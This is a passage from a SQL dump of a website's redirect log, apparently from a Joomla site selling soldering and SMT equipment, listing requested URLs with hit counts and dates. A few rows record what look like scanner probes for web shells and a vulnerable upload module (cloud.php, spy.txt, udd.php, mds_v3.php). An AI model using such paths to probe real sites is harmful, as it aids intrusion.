00:00:00',301),(11274,'http://www.3s-technologies.com.tr/tr/urunler/konveyorler/by,category_name',NULL,'','',49,0,'2017-11-12 04:46:54','0000-00-00 00:00:00',301),(11275,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/ess-310-24-detail?tmpl=component&print=1',NULL,'','',3,0,'2017-11-12 04:48:31','0000-00-00 00:00:00',301),(11276,'http://3s-technologies.com.tr/index.php/en/products/245-k100-detail?tmpl=component&print=1',NULL,'','',2,0,'2017-11-12 04:55:32','0000-00-00 00:00:00',301),(11277,'http://3s-technologies.com.tr/en/products/sp-18p-l-detail?tmpl=component&print=1',NULL,'','',16,0,'2017-11-12 04:58:25','0000-00-00 00:00:00',301),(11278,'http://3s-technologies.com.tr/index.php/en/products/manufacturer/mirae/smd-orta-hızlı/by,product_sku?language=en-gb',NULL,'','',3,0,'2017-11-12 05:05:47','0000-00-00 00:00:00',301),(11279,'http://www.3s-technologies.com.tr/en/products/smd-orta-hızlı/by,product_name',NULL,'','',590,0,'2017-11-12 05:09:36','0000-00-00 00:00:00',301),(11280,'http://3s-technologies.com.tr/index.php/en/products/smd-ultra-hız/by,`p`.product_sku?language=en-gb',NULL,'','',3,0,'2017-11-12 05:19:48','0000-00-00 00:00:00',301),(11281,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/tolo/smd-fırın/dirdesc/results,1-10',NULL,'','',6,0,'2017-11-12 05:25:45','0000-00-00 00:00:00',301),(11282,'http://3s-technologies.com.tr/tr/urunler/lehimleme-malzemeleri/krem-lehim/krem-lehim-31-32-33-detail',NULL,'','',10,0,'2017-11-12 05:27:38','0000-00-00 00:00:00',301),(11283,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/ddm-novastar/dalga-lehim/by,product_name/results,1-20',NULL,'','',9,0,'2017-11-12 05:50:35','0000-00-00 00:00:00',301),(11284,'http://3s-technologies.com.tr/en/products/e-bar-26-detail?tmpl=component&print=1',NULL,'','',14,0,'2017-11-12 05:56:29','0000-00-00 00:00:00',301),(11285,'http://3s-technologies.com.tr/index.php/en/products/thru-hole/by,category_name?language=en-gb',NULL,'','',18,0,'2017-11-12 05:59:32','0000-00-00 00:00:00',301),(11286,'http://www.3s-technologies.com.tr/tr/urunler/zero-ion-g3-detail?tmpl=component&print=1',NULL,'','',30,0,'2017-11-12 06:15:25','0000-00-00 00:00:00',301),(11287,'http://3s-technologies.com.tr/tr/urunler/dalga-lehim/mi-300-detail/askquestion?tmpl=component',NULL,'','',7,0,'2017-11-12 06:24:43','0000-00-00 00:00:00',301),(11288,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/ddm-novastar/dalga-lehim/by,product_name/results,1-10',NULL,'','',4,0,'2017-11-12 06:27:50','0000-00-00 00:00:00',301),(11289,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/tolo/screen-printer/results,1-5',NULL,'','',4,0,'2017-11-12 06:30:53','0000-00-00 00:00:00',301),(11290,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/tolo/dalga-lehim/by,product_sku',NULL,'','',26,0,'2017-11-12 06:40:14','0000-00-00 00:00:00',301),(11291,'http://www.3s-technologies.com.tr/tr/urunler/manufacturers/mirae',NULL,'','',72,0,'2017-11-12 06:41:33','0000-00-00 00:00:00',301),(11292,'http://www.3s-technologies.com.tr/en/products/2.-el-makineler/jvk-detail',NULL,'http://www.3s-technologies.com.tr/','',52,0,'2017-11-12 06:43:00','0000-00-00 00:00:00',301),(11293,'http://www.3s-technologies.com.tr/index.php/en/products/smd-orta-hızlı/by,product_sku?language=en-gb',NULL,'','',2,0,'2017-11-12 06:46:47','0000-00-00 00:00:00',301),(11294,'http://3s-technologies.com.tr/index.php/tr/ueruenler/lehimleme-malzemeleri/krem-lehim/by,product_name/dirdesc?language=tr-tr',NULL,'','',7,0,'2017-11-12 06:48:25','0000-00-00 00:00:00',301),(11295,'http://3s-technologies.com.tr/en/products/smd-orta-hızlı/by,product_name',NULL,'','',396,0,'2017-11-12 07:01:40','0000-00-00 00:00:00',301),(11296,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/temizleme-makineleri/stencil-washer-eco-detail/askquestion?tmpl=component',NULL,'','',24,0,'2017-11-12 07:01:58','0000-00-00 00:00:00',301),(11297,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/ddm-novastar/dalga-lehim/by,product_name/results,1-50',NULL,'','',1,0,'2017-11-12 07:05:04','0000-00-00 00:00:00',301),(11298,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/github.com/joomla',NULL,'','',5,0,'2017-11-12 07:08:21','0000-00-00 00:00:00',301),(11299,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/smd-ultra-hız/by,ordering?language=tr-tr',NULL,'','',2,0,'2017-11-12 07:08:46','0000-00-00 00:00:00',301),(11300,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/ueruenler/manufacturer/panasonic/smd-orta-hızlı/by,product_name/dirdesc',NULL,'','',512,0,'2017-11-12 07:24:31','0000-00-00 00:00:00',301),(11301,'http://www.3s-technologies.com.tr/en/products/manufacturers/panasonic?tmpl=component',NULL,'','',1,0,'2017-11-12 07:37:46','0000-00-00 00:00:00',301),(11302,'http://www.3s-technologies.com.tr/index.php/tr/hakk-m-zda',NULL,'','',58,0,'2017-11-12 07:42:18','0000-00-00 00:00:00',301),(11303,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/smd-düşük-hızlı/le-40v-detail/askquestion?tmpl=component',NULL,'','',50,0,'2017-11-12 07:47:05','0000-00-00 00:00:00',301),(11304,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/ddm-novastar/dalga-lehim/by,pc.ordering,product_name/results,1-5',NULL,'','',7,0,'2017-11-12 08:07:08','0000-00-00 00:00:00',301),(11305,'http://www.3s-technologies.com.tr/en/products/manufacturers/ddm-novastar',NULL,'','',82,0,'2017-11-12 08:19:33','0000-00-00 00:00:00',301),(11306,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/ddm-novastar/dalga-lehim/by,pc.ordering,product_name/results,1-20',NULL,'','',4,0,'2017-11-12 08:27:53','0000-00-00 00:00:00',301),(11307,'http://3s-technologies.com.tr/tr/urunler/2-el-makineler/dirdesc',NULL,'','',10,0,'2017-11-12 08:28:00','0000-00-00 00:00:00',301),(11308,'http://www.3s-technologies.com.tr/index.php/en/products/manufacturers/mirae',NULL,'','',32,0,'2017-11-12 08:44:18','0000-00-00 00:00:00',301),(11309,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/tolo/dalga-lehim/by,category_name',NULL,'','',28,0,'2017-11-12 08:44:22','0000-00-00 00:00:00',301),(11310,'http://3s-technologies.com.tr/index.php/en/products/manufacturer/mirae/smd-ultra-hız/by,mf_name/dirdesc?language=en-gb',NULL,'','',2,0,'2017-11-12 08:53:47','0000-00-00 00:00:00',301),(11311,'http://www.3s-technologies.com.tr/en/products/lehimleme-malzemeleri/flux/by,category_name',NULL,'','',53,0,'2017-11-12 09:00:57','0000-00-00 00:00:00',301),(11312,'http://3s-technologies.com.tr/en/products/lehimleme-malzemeleri/krem-lehim/krem-lehim-31-32-detail/askquestion?tmpl=component',NULL,'','',14,0,'2017-11-12 09:27:50','0000-00-00 00:00:00',301),(11313,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/tolo/dalga-lehim/by,`p`.product_sku',NULL,'','',5,0,'2017-11-12 09:30:23','0000-00-00 00:00:00',301),(11314,'http://www.3s-technologies.com.tr/index.php/en/products/smd-ultra-hız/by,mf_name?language=en-gb',NULL,'','',1,0,'2017-11-12 09:32:49','0000-00-00 00:00:00',301),(11315,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/tolo/screen-printer/results,1-50',NULL,'','',5,0,'2017-11-12 09:37:26','0000-00-00 00:00:00',301),(11316,'http://www.3s-technologies.com.tr/index.php/en/products/2.-el-makineler/by,category_name?language=en-gb',NULL,'','',26,0,'2017-11-12 09:45:27','0000-00-00 00:00:00',301),(11317,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/ddm-novastar/dalga-lehim/by,pc.ordering,product_name/results,1-10',NULL,'','',4,0,'2017-11-12 09:58:37','0000-00-00 00:00:00',301),(11318,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/tolo/smd-fırın/dirdesc/results,1-50',NULL,'','',4,0,'2017-11-12 10:26:50','0000-00-00 00:00:00',301),(11319,'http://3s-technologies.com.tr/index.php/en/products/lehimleme-malzemeleri/çubuk-lehim',NULL,'','',96,0,'2017-11-12 10:27:54','0000-00-00 00:00:00',301),(11320,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/ddm-novastar/dalga-lehim/by,pc.ordering,product_name/results,1-50',NULL,'','',4,0,'2017-11-12 10:33:54','0000-00-00 00:00:00',301),(11321,'http://3s-technologies.com.tr/index.php/en/products/krem-lehim-31-detail?tmpl=component&print=1',NULL,'','',9,0,'2017-11-12 10:36:33','0000-00-00 00:00:00',301),(11322,'http://www.3s-technologies.com.tr/tr/urunler/bölgesel-lehimleme',NULL,'','',238,0,'2017-11-12 10:37:54','0000-00-00 00:00:00',301),(11323,'http://www.3s-technologies.com.tr/tr/urunler/screen-printer/dirdesc',NULL,'','',39,0,'2017-11-12 10:40:57','0000-00-00 00:00:00',301),(11324,'http://www.3s-technologies.com.tr/index.php/en/products/asp-300-detail?tmpl=component&print=1',NULL,'','',24,0,'2017-11-12 10:45:47','0000-00-00 00:00:00',301),(11325,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/tolo/dalga-lehim/by,ordering',NULL,'','',3,0,'2017-11-12 10:48:01','0000-00-00 00:00:00',301),(11326,'http://3s-technologies.com.tr/tr/images/stories/virtuemart/category/resized/k_cwt_250x250.png',NULL,'','',3,0,'2017-11-12 10:52:26','0000-00-00 00:00:00',301),(11327,'https://www.3s-technologies.com.tr/tr/images/stories/virtuemart/manufacturer/resized/logo-panasonic6_250x250.jpg',NULL,'','',1,0,'2017-11-12 10:55:09','0000-00-00 00:00:00',301),(11328,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/tolo/screen-printer/by,product_sku',NULL,'','',30,0,'2017-11-12 11:02:08','0000-00-00 00:00:00',301),(11329,'http://www.3s-technologies.com.tr/en/products/manufacturer/mirae/smd-ultra-hız/by,mf_name',NULL,'','',543,0,'2017-11-12 11:03:31','0000-00-00 00:00:00',301),(11330,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/tolo/dalga-lehim/results,1-20',NULL,'','',4,0,'2017-11-12 11:09:11','0000-00-00 00:00:00',301),(11331,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/tolo/smd-fırın/by,category_name/results,1-5',NULL,'','',13,0,'2017-11-12 11:16:15','0000-00-00 00:00:00',301),(11332,'http://3s-technologies.com.tr/index.php/en/products/lehimleme-malzemeleri/tel-lehim/245-sn63pb37-0.4mm-29-detail/askquestion?tmpl=component',NULL,'','',13,0,'2017-11-12 11:21:04','0000-00-00 00:00:00',301),(11333,'https://www.3s-technologies.com.tr/tr/images/stories/virtuemart/category/resized/sp18_250x250.jpg',NULL,'','',1,0,'2017-11-12 11:23:29','0000-00-00 00:00:00',301),(11334,'http://3s-technologies.com.tr/en/products/lehimleme-malzemeleri/flux',NULL,'','',37,0,'2017-11-12 11:25:35','0000-00-00 00:00:00',301),(11335,'http://www.3s-technologies.com.tr/index.php/en/products/flux/by,product_name/dirdesc?language=en-gb',NULL,'','',24,0,'2017-11-12 11:29:08','0000-00-00 00:00:00',301),(11336,'http://www.3s-technologies.com.tr/tr/urunler/smd-ultra-hız/dirdesc',NULL,'','',228,0,'2017-11-12 11:37:26','0000-00-00 00:00:00',301),(11337,'http://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/ddm-novastar/screen-printer/by,product_name/dirdesc?language=tr-tr',NULL,'','',7,0,'2017-11-12 11:41:34','0000-00-00 00:00:00',301),(11338,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/ddm-novastar/dalga-lehim/by,category_name?language=tr-tr',NULL,'','',25,0,'2017-11-12 11:43:51','0000-00-00 00:00:00',301),(11339,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/av132-detail?tmpl=component&print=1',NULL,'','',3,0,'2017-11-12 11:51:33','0000-00-00 00:00:00',301),(11340,'http://3s-technologies.com.tr/index.php/en/products/thru-hole/by,`p`.product_sku?language=en-gb',NULL,'','',8,0,'2017-11-12 11:58:24','0000-00-00 00:00:00',301),(11341,'http://www.3s-technologies.com.tr/tr/admin',NULL,'','',48,0,'2017-11-12 11:58:37','0000-00-00 00:00:00',301),(11342,'http://www.3s-technologies.com.tr/tr/media/cloud.php',NULL,'','',11,0,'2017-11-12 11:58:45','0000-00-00 00:00:00',301),(11343,'http://www.3s-technologies.com.tr/tr/media/spy.txt',NULL,'','',11,0,'2017-11-12 11:58:46','0000-00-00 00:00:00',301),(11344,'http://www.3s-technologies.com.tr//modules/mod_simplefileuploadv1.3/elements/udd.php',NULL,'','',170,0,'2017-11-12 11:58:46','0000-00-00 00:00:00',301),(11345,'http://www.3s-technologies.com.tr/tr/modules/mod_simplefileuploadv1.3/elements/mds_v3.php',NULL,'','',11,0,'2017-11-12 11:58:47','0000-00-00 00:00:00',301),(11346,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/screen-printer/spr-20-41-42-detail/askquestion?tmpl=component',NULL,'','',24,0,'2017-11-12 12:09:01','0000-00-00 00:00:00',301),(11347,'http://www.3s-technologies.com.tr/tr/images/stories/virtuemart/product/resized/spartan_8s_250x250.gif',NULL,'','',4,0,'2017-11-12 12:13:38','0000-00-00 00:00:00',301),(11348,'http://3s-technologies.com.tr/index.php/en/products/manufacturer/panasonic/screen-printer/by,`p`.product_sku/dirdesc?language=en-gb',NULL,'','',8,0,'2017-11-12 12:17:04','0000-00-00 00:00:00',301),(11349,'http://3s-technologies.com.tr/index.php/en/products/lehimleme-malzemeleri/flux/by,ordering?language=en-gb',NULL,'','',8,0,'2017-11-12 12:20:28','0000-00-00 00:00:00',301),(11350,'http://www.3s-technologies.com.tr/tr/urunler/cs40-detail?tmpl=component&print=1',NULL,'','',36,0,'2017-11-12 12:21:13','0000-00-00 00:00:00',301),(11351,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/panasonic/smd-ultra-hız/by,mf_name?language=tr-tr',NULL,'','',2,0,'2017-11-12 12:30:06','0000-00-00 00:00:00',301),(11352,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/images/stories/virtuemart/manufacturer/resized/tolo_logo_250x250.jpg',NULL,'','',7,0,'2017-11-12 12:30:24','0000-00-00 00:00:00',301),(11353,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/images/stories/virtuemart/category/resized/npm_250x250.jpg',NULL,'','',1,0,'2017-11-12 12:30:44','0000-00-00 00:00:00',301),(11354,'http://3s-technologies.com.tr/tr/images/stories/virtuemart/category/resized/t_ly8c_250x250.jpg',NULL,'','',1,0,'2017-11-12 12:37:43','0000-00-00 00:00:00',301),(11355,'http://3s-technologies.com.tr/tr/images/stories/virtuemart/category/resized/avk3_1m_250x250.jpg',NULL,'','',2,0,'2017-11-12 12:42:01','0000-00-00 00:00:00',301),(11356,'http://www.3s-technologies.com.tr/tr/images/stories/virtuemart/product/resized/trident_full_view_250x250.jpg',NULL,'','',1,0,'2017-11-12 12:45:11','0000-00-00 00:00:00',301),(11357,'http://3s-technologies.com.tr/en/products/manufacturer/ddm-novastar/screen-printer/by,`p`.product_sku/dirdesc',NULL,'','',1,0,'2017-11-12 12:46:14','0000-00-00 00:00:00',301),(11358,'https://www.3s-technologies.com.tr/tr/images/stories/virtuemart/product/resized/am100_250x250.jpg',NULL,'','',1,0,'2017-11-12 12:52:10','0000-00-00 00:00:00',301),(11359,'http://3s-technologies.com.tr/index.php/tr/ueruenler/zero-ion-g3-detail?tmpl=component&print=1',NULL,'','',7,0,'2017-11-12 12:53:13','0000-00-00 00:00:00',301),(11360,'https://www.3s-technologies.com.tr/tr/images/stories/virtuemart/product/resized/le40v_400x214_250x250.jpg',NULL,'','',1,0,'2017-11-12 12:53:47','0000-00-00 00:00:00',301),(11361,'https://www.3s-technologies.com.tr/tr/images/stories/virtuemart/product/resized/jv131_250x250.jpg',NULL,'','',2,0,'2017-11-12 12:54:02','0000-00-00 00:00:00',301),(11362,'https://www.3s-technologies.com.tr/tr/images/stories/virtuemart/product/resized/sp18_250x250.jpg',NULL,'','',4,0,'2017-11-12 12:54:05','0000-00-00 00:00:00',301),(11363,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/tolo/dalga-lehim/dirdesc/results,1-10',NULL,'','',2,0,'2017-11-12 12:55:04','0000-00-00 00:00:00',301),(11364,'http://www.3s-technologies.com.tr/tr/images/stories/virtuemart/category/resized/ess-310-left-400x464_250x250.jpg',NULL,'','',9,0,'2017-11-12 12:55:11','0000-00-00 00:00:00',301),(11365,'http://3s-technologies.com.tr/tr/images/stories/virtuemart/product/resized/avb_1_250x250.jpg',NULL,'','',1,0,'2017-11-12 12:55:14','0000-00-00 00:00:00',301),(11366,'http://3s-technologies.com.tr/tr/images/stories/virtuemart/product/resized/avb_12_250x250.jpg',NULL,'','',1,0,'2017-11-12 12:56:45','0000-00-00 00:00:00',301),(11367,'http://3s-technologies.com.tr/tr/images/stories/virtuemart/category/resized/npm_250x250.jpg',NULL,'','',1,0,'2017-11-12 12:57:25','0000-00-00 00:00:00',301),(11368,'http://www.3s-technologies.com.tr/tr/images/stories/virtuemart/category/resized/le40v_400x214_250x250.jpg',NULL,'','',7,0,'2017-11-12 12:57:26','0000-00-00 00:00:00',301),(11369,'https://www.3s-technologies.com.tr/tr/images/stories/virtuemart/product/resized/spr-20_250x250.gif',NULL,'','',1,0,'2017-11-12 12:57:26','0000-00-00 00:00:00',301),(11370,'http://www.3s-technologies.com.tr/tr/images/stories/virtuemart/category/resized/avk3_1m_250x250.jpg',NULL,'','',11,0,'2017-11-12 12:57:29','0000-00-00 00:00:00',301),(11371,'https://www.3s-technologies.com.tr/tr/images/stories/virtuemart/product/resized/t_mi300_250x250.jpg',NULL,'','',1,0,'2017-11-12 12:57:30','0000-00-00 00:00:00',301),(11372,'https://www.3s-technologies.com.tr/tr/images/stories/virtuemart/category/resized/npm_250x250.jpg',NULL,'','',1,0,'2017-11-12 12:57:36','0000-00-00 00:00:00',301),(11373,'http://3s-technologies.com.tr/tr/images/stories/virtuemart/category/resized/k_all_250x250.png',NULL,'','',1,0,'2017-11-12 13:29:27','0000-00-00 00:00:00',301),(11374,'http://3s-technologies.com.tr/index.php/en/products/krem-lehim',NULL,'','',18,0,'2017-11-12 13:31:26','0000-00-00 00:00:00',301),(11375,'http://3s-technologies.com.tr/index.php/tr/ueruenler/screen-printer/sp-18p-l-detail/askquestion?tmpl=component',NULL,'','',14,0,'2017-11-12 13:32:41','0000-00-00 00:00:00',301),(11376,'https://www.3s-technologies.com.tr/tr/images/stories/virtuemart/category/resized/k_kr907_s_250x250.png',NULL,'','',1,0,'2017-11-12 13:33:12','0000-00-00 00:00:00',301),(11377,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/smd-düşük-hızlı/by,mf_name?language=tr-tr',NULL,'','',2,0,'2017-11-12 13:35:08','0000-00-00 00:00:00',301),(11378,'http://www.3s-technologies.com.tr/tr/images/stories/virtuemart/product/resized/spr-20_250x250.gif',NULL,'','',2,0,'2017-11-12 13:38:56','0000-00-00 00:00:00',301),(11379,'http://www.3s-technologies.com.tr/tr/images/stories/virtuemart/category/resized/t_ly8c_250x250.jpg',NULL,'','',11,0,'2017-11-12 13:41:25','0000-00-00 00:00:00',301),(11380,'http://www.3s-technologies.com.tr/en/products/manufacturer/ddm-novastar/screen-printer',NULL,'','',48,0,'2017-11-12 13:49:11','0000-00-00 00:00:00',301),(11381,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/tolo/dalga-lehim/dirdesc/results,1-50',NULL,'','',7,0,'2017-11-12 13:58:36','0000-00-00 00:00:00',301),(11382,'http://3s-technologies.com.tr/tr/urunler/manufacturer/tolo/screen-printer/by,product_sku',NULL,'','',15,0,'2017-11-12 14:02:31','0000-00-00 00:00:00',301),(11383,'http://3s-technologies.com.tr/tr/images/stories/virtuemart/product/resized/spr-25_250x250.jpg',NULL,'','',1,0,'2017-11-12 14:02:38','0000-00-00 00:00:00',301),(11384,'http://3s-technologies.com.tr/en/products/konveyorler/by,product_name',NULL,'','',10,0,'2017-11-12 14:09:11','0000-00-00 00:00:00',301),(11385,'http://www.3s-technologies.com.tr/en/products/lehimleme-malzemeleri/tel-lehim/245-k100-28-29-detail',NULL,'','',25,0,'2017-11-12 14:11:58','0000-00-00 00:00:00',301),(11386,'http://www.3s-technologies.com.tr/en/products/manufacturer/tolo/dalga-lehim',NULL,'','',53,0,'2017-11-12 14:12:42','0000-00-00 00:00:00',301),(11387,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/products/manufacturer/tolo/smd-fırın?language=en-gb',NULL,'','',253,0,'2017-11-12 14:19:19','0000-00-00 00:00:00',301),(11388,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/products/smd-düşük-hızlı',NULL,'','',250,0,'2017-11-12 14:19:21','0000-00-00 00:00:00',301),(11389,'http://www.3s-technologies.com.tr/tr/urunler/dalga-lehim/by,category_name',NULL,'','',36,0,'2017-11-12 14:26:49','0000-00-00 00:00:00',301),(11390,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/temizleme-makineleri/zero-ion-g3-detail',NULL,'','',3,0,'2017-11-12 14:33:53','0000-00-00 00:00:00',301),(11391,'http://www.3s-technologies.com.tr/tr/images/stories/virtuemart/product/resized/am100_250x250.jpg',NULL,'','',4,0,'2017-11-12 14:55:57','0000-00-00 00:00:00',301),(11392,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/tolo/dalga-lehim/by,category_name?language=tr-tr',NULL,'','',26,0,'2017-11-12 14:56:56','0000-00-00 00:00:00',301),(11393,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/çubuk-lehim/e-bar-26-detail/askquestion?tmpl=component',NULL,'','',58,0,'2017-11-12 14:57:04','0000-00-00 00:00:00',301),(11394,'http://www.3s-technologies.com.tr/index.php/en/products/smd-orta-hızlı/by,product_name?language=en-gb',NULL,'','',2,0,'2017-11-12 14:57:05','0000-00-00 00:00:00',301),(11395,'https://www.3s-technologies.com.tr/tr/images/stories/virtuemart/product/resized/zero-g3_250x250.jpg',NULL,'','',1,0,'2017-11-12 14:59:29','0000-00-00 00:00:00',301),(11396,'http://www.3s-technologies.com.tr/en/products/manufacturer/panasonic/screen-printer/by,category_name',NULL,'','',41,0,'2017-11-12 14:59:56','0000-00-00 00:00:00',301),(11397,'http://3s-technologies.com.tr/index.php/tr/ueruenler/bölgesel-lehimleme/by,`p`.product_sku?language=tr-tr',NULL,'','',1,0,'2017-11-12 15:00:46','0000-00-00 00:00:00',301),(11398,'http://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/mirae/smd-orta-hızlı/by,`p`.product_sku/dirdesc?language=tr-tr',NULL,'','',1,0,'2017-11-12 15:07:36','0000-00-00 00:00:00',301),(11399,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/tolo/screen-printer/by,ordering?language=tr-tr',NULL,'','',24,0,'2017-11-12 15:10:44','0000-00-00 00:00:00',301),(11400,'http://3s-technologies.com.tr/tr/images/stories/virtuemart/product/resized/kopyası-gf-12ht_250x250.gif',NULL,'','',1,0,'2017-11-12 15:11:07','0000-00-00 00:00:00',301),(11401,'http://www.3s-technologies.com.tr/en/products/manufacturer/ddm-novastar/smd-fırın',NULL,'','',640,0,'2017-11-12 15:12:24','0000-00-00 00:00:00',301),(11402,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/tolo/dalga-lehim/by,product_sku/results,1-5',NULL,'','',1,0,'2017-11-12 15:30:21','0000-00-00 00:00:00',301),(11403,'http://www.3s-technologies.com.tr/en/products/smd-ultra-hä±z',NULL,'','',6,0,'2017-11-12 15:33:57','0000-00-00 00:00:00',301),(11404,'https://www.3s-technologies.com.tr/tr/images/stories/virtuemart/category/resized/k_all_250x250.png',NULL,'','',1,0,'2017-11-12 15:48:20','0000-00-00 00:00:00',301),(11405,'http://www.3s-technologies.com.tr/tr/urunler/dalga-lehim/by,ordering',NULL,'','',2,0,'2017-11-12 15:51:32','0000-00-00 00:00:00',301),(11406,'http://www.3s-technologies.com.tr/tr/images/stories/virtuemart/manufacturer/resized/index_01_250x250.jpg',NULL,'','',8,0,'2017-11-12 15:51:39','0000-00-00 00:00:00',301),(11407,'http://www.3s-technologies.com.tr/tr/urunler/dalga-lehim/results,1-20',NULL,'','',3,0,'2017-11-12 16:06:11','0000-00-00 00:00:00',301),(11408,'http://3s-technologies.com.tr/tr/images/stories/virtuemart/product/resized/spr-45va_250x250.gif',NULL,'','',1,0,'2017-11-12 16:14:01','0000-00-00 00:00:00',301),(11409,'http://www.3s-technologies.com.tr/index.php/en/products/bölgesel-lehimleme/ess-310-detail',NULL,'','',68,0,'2017-11-12 16:24:37','0000-00-00 00:00:00',301),(11410,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/tolo/dalga-lehim/by,product_sku/results,1-50',NULL,'','',5,0,'2017-11-12 16:48:00','0000-00-00 00:00:00',301),(11411,'http://3s-technologies.com.tr/en/home2/79-english-uk?format=feed&type=atom',NULL,'','',1,0,'2017-11-12 16:56:37','0000-00-00 00:00:00',301),(11412,'http://www.3s-technologies.com.tr/tr/urunler/lehimleme-malzemeleri/krem-lehim/by,product_name',NULL,'','',50,0,'2017-11-12 17:01:39','0000-00-00 00:00:00',301),(11413,'http://www.3s-technologies.com.tr/index.php/en/products/lehimleme-malzemeleri/flux',NULL,'','',27,0,'2017-11-12 17:14:47','0000-00-00 00:00:00',301),(11414,'http://www.3s-technologies.com.tr/en/products/manufacturer/ddm-novastar/dalga-lehim/dirdesc',NULL,'','',46,0,'2017-11-12 17:23:17','0000-00-00 00:00:00',301),(11415,'http://www.3s-technologies.com.tr/tr/urunler/dalga-lehim/by,mf_name/dirdesc',NULL,'','',8,0,'2017-11-12 18:26:49','0000-00-00 00:00:00',301),(11416,'http://www.3s-technologies.com.tr/en/products/manufacturer/ddm-novastar/dalga-lehim/by,mf_name',NULL,'','',45,0,'2017-11-12 18:33:52','0000-00-00 00:00:00',301),(11417,'http://www.3s-technologies.com.tr/tr/urunler/lehimleme-malzemeleri/by,mf_name',NULL,'','',41,0,'2017-11-12 18:38:06','0000-00-00 00:00:00',301),(11418,'http://www.3s-technologies.com.tr/tr/urunler/temizleme-makineleri/by,category_name',NULL,'','',45,0,'2017-11-12 18:38:08','0000-00-00 00:00:00',301),(11419,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturers/tolo',NULL,'','',7,0,'2017-11-12 18:47:59','0000-00-00 00:00:00',301),(11420,'http://3s-technologies.com.tr/tr/?option=com_content&view=article&id=88&itemid=100',NULL,'','',9,0,'2017-11-12 19:06:44','0000-00-00 00:00:00',301),(11421,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/dalga-lehim/by,category_name',NULL,'','',9,0,'2017-11-12 19:18:38','0000-00-00 00:00:00',301),(11422,'http://3s-technologies.com.tr/en/products/thru-hole/jv131-detail/askquestion?tmpl=component',NULL,'','',16,0,'2017-11-12 19:21:06','0000-00-00 00:00:00',301),(11423,'http://www.3s-technologies.com.tr/index.php/en/products/flux/by,`p`.product_sku/dirdesc?language=en-gb',NULL,'','',25,0,'2017-11-12 19:23:41','0000-00-00 00:00:00',301),(11424,'http://www.3s-technologies.com.tr/en/products/manufacturer/ddm-novastar/dalga-lehim/results,1-5',NULL,'','',2,0,'2017-11-12 19:35:49','0000-00-00 00:00:00',301),(11425,'http://www.3s-technologies.com.tr/tr/images/stories/virtuemart/product/resized/k_cwlf_250x250.png',NULL,'','',1,0,'2017-11-12 20:01:55','0000-00-00 00:00:00',301),(11426,'http://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/tolo/smd-fırın/dirdesc?language=tr-tr',NULL,'','',1,0,'2017-11-12 20:11:03','0000-00-00 00:00:00',301),(11427,'http://3s-technologies.com.tr/index.php/tr/ueruenler/smd-düşük-hızlı',NULL,'','',410,0,'2017-11-12 20:11:31','0000-00-00 00:00:00',301),(11428,'http://3s-technologies.com.tr/index.php/tr/ueruenler/smd-düşük-hızlı/by,`p`.product_sku',NULL,'','',395,0,'2017-11-12 20:11:38','0000-00-00 00:00:00',301),(11429,'http://3s-technologies.com.tr/index.php/tr/ueruenler/smd-düşük-hızlı/by,`p`.product_sku/dirdesc',NULL,'','',390,0,'2017-11-12 20:11:46','0000-00-00 00:00:00',301),(11430,'http://3s-technologies.com.tr/index.php/tr/ueruenler/smd-düşük-hızlı/by,category_name',NULL,'','',393,0,'2017-11-12 20:12:09','0000-00-00 00:00:00',301),(11431,'http://3s-technologies.com.tr/index.php/tr/ueruenler/smd-düşük-hızlı/by,product_name',NULL,'','',408,0,'2017-11-12 20:12:38','0000-00-00 00:00:00',301),(11432,'http://3s-technologies.com.tr/index.php/tr/ueruenler/smd-düşük-hızlı/by,product_name/dirdesc',NULL,'','',408,0,'2017-11-12 20:12:48','0000-00-00 00:00:00',301),(11433,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/products/lehimleme-malzemeleri/çubuk-lehim/e-bar-26-detail',NULL,'','',251,0,'2017-11-12 20:14:01','0000-00-00 